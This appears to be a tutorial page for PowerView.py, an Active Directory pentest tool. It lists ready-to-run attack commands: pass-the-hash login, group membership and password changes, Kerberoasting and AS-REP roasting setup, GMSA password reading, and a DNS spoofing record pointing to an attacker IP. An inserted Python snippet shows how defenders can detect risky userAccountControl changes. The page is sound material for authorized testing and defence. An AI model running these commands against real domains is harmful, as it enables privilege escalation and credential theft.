🧠PowerView.py

Introduction

PowerView.py is an alternative to the fantastic original PowerView.ps1 script. Most of the modules available in PowerView.ps1 are implemented here (some of the flags have changed). The main goal is to provide an interactive session so that you do not have to re-authenticate to LDAP for every query.


GitHub Repository: aniqfakhrul/powerview.py - Just another Powerview alternative

Installation

Before installing PowerView.py, you need to install the required system dependencies:

sudo apt install libkrb5-dev

Then install PowerView using pip:

pip3 install powerview --break-system-packages

Usage

PowerView.py supports multiple authentication methods for connecting to Active Directory environments.

Basic Authentication (Username/Password)

powerview domain.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10

Pass-the-Hash (PtH) Authentication

powerview domain.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10

Kerberos Authentication

powerview domain.htb/user@dc.domain.htb --dc-ip 10.10.10.10 -ns dc.domain.htb -k --no-pass

Web Browser Interface

PowerView.py also provides a web interface for easier interaction:

powerview domain.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000

Attacking Active Directory with PowerView.py

PowerView.py provides various commands for Active Directory enumeration and exploitation. Below are some common attack scenarios and their corresponding commands.

User and Group Management

Add User to Group

Add a user to a specific domain group:

Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'

Modify User Password

Change a user's password (requires appropriate permissions):

Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Add New Domain User

Create a new user in the domain:

Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'

Kerberoasting Attacks

Set ServicePrincipalName for Kerberoasting

Assign a ServicePrincipalName (SPN) to a user for Kerberoasting attacks. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

Execute Kerberoasting Attack

Perform Kerberoasting to extract service tickets:

Invoke-Kerberoast

ASREPRoasting Attacks

Enable DONT_REQ_PREAUTH for ASREPRoast

Configure a user account to not require Kerberos pre-authentication. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

Account Management

Enable Disabled User Account

Remove the ACCOUNTDISABLE flag to enable a disabled user account:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'
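To see what the two userAccountControl values above (4260352 and 66048) actually set, and to spot the same changes from the defender's side, here is an added Python example (not PowerView.py's code and not from the original page): it decodes the bitmask and flags transitions such as DONT_REQ_PREAUTH being set or ACCOUNTDISABLE being cleared. The flag bits are the documented Active Directory values; the change records it audits are constructed.

```python
# Added example, not from PowerView.py or the original page: decodes the
# userAccountControl bitmask (the 4260352 and 66048 values above) and flags the
# transitions a defender would alert on. Flag bits are the documented AD values;
# the sample change records below are constructed.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# (flag, "set" | "cleared") transitions worth an alert.
RISKY_TRANSITIONS = {
    ("DONT_REQ_PREAUTH", "set"),       # account becomes AS-REP roastable
    ("ACCOUNTDISABLE", "cleared"),     # dormant account brought back to life
    ("PASSWD_NOTREQD", "set"),
    ("TRUSTED_FOR_DELEGATION", "set"),
    ("USE_DES_KEY_ONLY", "set"),
}

def decode_uac(value: int) -> list[str]:
    """Flag names set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def uac_transitions(old: int, new: int) -> list[tuple[str, str]]:
    """Every known flag that differs between two userAccountControl values."""
    return [(name, "set" if new & bit else "cleared")
            for bit, name in sorted(UAC_FLAGS.items()) if (old ^ new) & bit]

def risky_uac_changes(old: int, new: int) -> list[str]:
    """Human-readable alerts for the risky transitions between old and new."""
    return [f"{name} {how}" for name, how in uac_transitions(old, new)
            if (name, how) in RISKY_TRANSITIONS]

# Constructed sample: (account, old UAC, new UAC), as a 4738-style change record carries.
SAMPLE_CHANGES = [
    ("svc_backup", 66048, 4260352),  # pre-auth switched off -> AS-REP roastable
    ("j.doe", 66050, 66048),         # disabled account re-enabled
    ("alice", 512, 66048),           # password set to never expire: not alerted
]

def audit(changes=SAMPLE_CHANGES) -> dict[str, list[str]]:
    """Map each account to its alerts, dropping accounts with none."""
    return {acct: alerts for acct, old, new in changes
            if (alerts := risky_uac_changes(old, new))}
```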

GMSA (Group Managed Service Accounts)

Read GMSA Password

Extract Group Managed Service Account passwords:

Get-GMSA

Object Ownership and Permissions

Change Object Owner

Make a user the owner of a specific object:

Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

Computer Management

Add New Domain Computer

Create a new computer account in the domain:

Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'

DNS Manipulation

Create DNS Record for Spoofing

Add a new DNS record for DNS spoofing attacks:

Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>

Security Considerations

When using PowerView.py for penetration testing or security assessments:

  • Always ensure you have proper authorization before testing

  • Use these tools only in authorized environments

  • Document all activities for reporting purposes

  • Follow responsible disclosure practices

  • Be aware of the potential impact of your actions on production systems

Troubleshooting

If you encounter issues during installation or usage:

  1. Ensure all dependencies are properly installed

  2. Verify network connectivity to the target domain controller

  3. Check authentication credentials and permissions

  4. Review error messages for specific guidance

  5. Consult the GitHub repository for updates and known issues
